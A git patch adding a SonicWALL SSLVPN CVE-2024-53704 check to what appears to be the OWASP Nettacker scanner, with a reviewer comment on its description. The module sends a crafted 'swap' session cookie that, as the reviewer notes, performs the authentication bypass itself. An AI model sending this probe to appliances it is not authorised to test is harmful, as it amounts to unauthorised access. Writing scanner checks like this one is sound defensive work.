From 626a76570890a9c090a3897149ab1b1d68b0f358 Mon Sep 17 00:00:00 2001
From: Sam Stepanyan
Date: Thu, 20 Feb 2025 02:30:11 +0000
Subject: [PATCH] adding SonicWALL SSLVPN CVE-2024-53704 module (#1018)
* Update paloalto_panos_cve_2025_0108.yaml added cisa_kev Adding cisa_kev profile to the module: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has just added this CVE-2025-0108 impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. * adding sonicwall_sslvpn_cve_2024_53704_vuln module
---
 docs/Modules.md | 1 +
 .../vuln/sonicwall_sslvpn_cve_2024_53704.yaml | 58 +++++++++++++++++++
 2 files changed, 59 insertions(+)
 create mode 100644 nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml
diff --git a/docs/Modules.md b/docs/Modules.md
index a364cc97..e65ee37d 100644
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -153,6 +153,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
 * '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
 * '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
+* '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
 * '**ssl_signed_certificate_vuln**' - check for self-signed & other signing issues(weak signing algorithm) in SSL certificate
 * '**ssl_expired_certificate_vuln**' - check if SSL certificate has expired or is close to expiring
 * '**ssl_version_vuln**' - check if the server's SSL configuration supports old and insecure SSL versions
diff --git a/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml b/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml
new file mode 100644
index 00000000..dbc057dc
--- /dev/null
+++ b/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml
@@ -0,0 +1,58 @@ +info: + name: sonicwall_sslvpn_cve_2024_53704_vuln + author: OWASP Nettacker team + severity: 8.2 + description: CVE-2024-53704 Is an Improper Authentication vulnerability in the SonicWALL SSLVPN authentication mechanism which allows a remote attacker to bypass authentication. + reference: + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003 + - https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking + - https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog + profiles: + - vuln + - vulnerability + - http + - high_severity + - cve + - sonicwall + - cisa_kev + + +payloads: + - library: http + steps: + - method: get + timeout: 3 + headers: + Host: "{target}" + User-Agent: "{user_agent}" + Cookie: 'swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=' + allow_redirects: false + ssl: false + url: + nettacker_fuzzer: + input_format: "{{schema}}://{target}:{{ports}}/{{paths}}" + prefix: "" + suffix: "" + interceptors: + data: + paths: + - "cgi-bin/sslvpnclient?launchplatform=" + schema: + - "https" + ports: + - 443 + - 4433 + - 4443 + response: + condition_type: and + conditions: + status_code: + regex: "200" + reverse: false + header: + Server: + regex: 'SonicWALL SSLVPN Web Server' + reverse: false + content: + regex: 'NELaunchX1' + reverse: false \ No newline at end of file
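Review bot: The `info.description` in this hunk does not say that the module is an active exploitation probe rather than a banner or version check: the step sends a crafted `swap` session cookie to the `cgi-bin/sslvpnclient` endpoint and declares the target vulnerable when it answers 200 with the expected `Server` header and `NELaunchX1` content, which per the referenced advisories is the authentication-bypass path itself, so a positive result against a production appliance is a real bypass event and will be logged by the device as such. Operators choosing modules by profile (`vuln`, `cisa_kev`) should be told this up front; I would extend the description to `description: CVE-2024-53704 is an Improper Authentication vulnerability in the SonicWALL SSLVPN authentication mechanism which allows a remote attacker to bypass authentication. This module actively probes the flaw by sending a crafted swap session cookie to the sslvpnclient endpoint; a positive match is itself an authentication bypass and is expected to appear in the appliance's logs.` The same line also capitalises `Is` mid-sentence. It is not clear from the hunk whether `ssl: false` disables certificate verification or selects plain HTTP while the fuzzer schema is `https`; a one-line comment above it stating the intended meaning would help the next maintainer. The file also ends without a trailing newline (`\ No newline at end of file`), which yamllint flags.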